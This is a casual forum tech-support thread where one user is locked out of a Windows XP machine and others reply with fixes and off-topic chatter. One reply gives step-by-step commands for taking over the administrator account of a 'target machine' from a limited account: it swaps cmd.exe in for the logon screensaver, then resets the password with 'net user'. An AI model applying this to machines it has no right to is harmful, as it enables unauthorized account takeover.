<<< 12Oz Computer Tech Support SuperThread >>>

Mainter

This forum is supported by the 12ozProphet Shop, so go buy a shirt and help support!
This forum is brought to you by the 12ozProphet Shop.
This forum is brought to you by the 12oz Shop.

cool desk....but its blockin the closet!?w/e....

Okay okay, i admit it....i done fucked up again.....

....not realizing the systems and admin passwords were still set, i rebooted my comp...so then that black screen appears and i cant type anything in yet miraculously the enter key works???!!

so i pull the plug, wait a minute and turn on to see if i can type yet....on the "third attempt" it continued on to the xp login screen somehow without the pass being typed...i guessi got lucky...

>>>HOW CAN A TAKE OUT THE SYSTEM AND ADMIN PASSWORDS?????can this be done w/o restarting???-cuz im scarred that i wont be able to get to the xp login screen again :(

thanks again

cool desk....but its blockin the closet!?w/e....

Okay okay, i admit it....i done fucked up again.....

....not realizing the systems and admin passwords were still set, i rebooted my comp...so then that black screen appears and i cant type anything in yet miraculously the enter key works???!!

so i pull the plug, wait a minute and turn on to see if i can type yet....on the "third attempt" it continued on to the xp login screen somehow without the pass being typed...i guessi got lucky...

>>>HOW CAN A TAKE OUT THE SYSTEM AND ADMIN PASSWORDS?????can this be done w/o restarting???-cuz im scarred that i wont be able to get to the xp login screen again :(

thanks again

a couple of pages back i posted a tutorial on how to break into an xp machine.

Intel introduces Tulsa. Intel today released its new Tulsa CPU, a multi-core Xeon chip with varying degress of onboard cache, starting at 4MB and then going up to 16MB at 3.4GHz. Supposed to give AMD's heavily muscled new Opterons a run for their money. We're thinking about getting one since it's supposed to up Java server performance by up to 42 percent

a couple of pages back i posted a tutorial on how to break into an xp machine.

was this before the tech support took a "vacation"

i tried searching terms like break, into, xp, machine, ect.....but no luck...

im not exactly trying to hack my machine if u know what i mean, but if its the only way ill try it, or anything!!!!

was this before the tech support took a "vacation"

i tried searching terms like break, into, xp, machine, ect.....but no luck...

im not exactly trying to hack my machine if u know what i mean, but if its the only way ill try it, or anything!!!!

Automatic Administrator Login:

REGEDIT 4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]

"AutoAdminLogon"="1"

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt

then enter this set of commands Exactly:

cd\ *drops to root

cd\windows\system32 *directs to the system32 dir

mkdir temphack *creates the folder temphack

copy logon.scr temphack\logon.scr *backsup logon.scr

copy cmd.exe temphack\cmd.exe *backsup cmd.exe

del logon.scr *deletes original logon.scr

rename cmd.exe logon.scr *renames cmd.exe to logon.scr

exit *quits dos

Now what you have just done is told the computer to backup the command program

and the screen saver file, then edits the settings so when the machine boots the

screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user <admin account name here> password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

this one should work the best

http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line

215-

Well, I found this- <http://home.eunet.no/~pnordahl/ntpasswd/> but it sounds somewhat risky, so if you decide to take the plunge, make sure to read everything twice- even better, print that shit out...that way, you'll have it handy when there's no Interweb to look at.

If all you're after is the files, you can do that with a Linux live CD and a external HD. However, I'm going to be lazy (last night was a motherfucker) and not explain how to do this unless you want to go this route...it's not hard, but it does require you to do a couple things you may not have done before, like burning an ISO disk and switching your boot order in BIOS...nothing major, but I'd want someone to coach me if I was doing it for the first time

So i got this weird as problem with my PC/labtop, every time I shut it down, then turn it on when im going to use it, the screen stays dark as if I turned the screen brightness all the way down, So then I wait a minute till i think the welcome screen is up, type my password, then it turns on, and I have to hit f7 to turn the screen brightness back up. I never turn it down at all but for some reason it just turns off when the comp shuts down, cant figure it out, can anyone????????????? its a toshiba labtop if that helps.

its a cheap microsoft optical mouse... ill go find an even cheaper one to plug in for now and get a screw driver.... im at work btw.... if this happened at home i would be very unhappy...

i think i right click>open link in a new tab more often than anything else all day...

ah, make work pay for it.

once upon a midnight dreary, while i pron surfed, weak and weary, over many a strange and spurious site of ' hot xxx galore'. While i clicked my fav'rite bookmark, suddenly there came a warning, and my heart was filled with mourning, mourning for my dear amour, " 'Tis not possible!", i muttered, " give me back my free hardcore!"..... quoth the server, 404.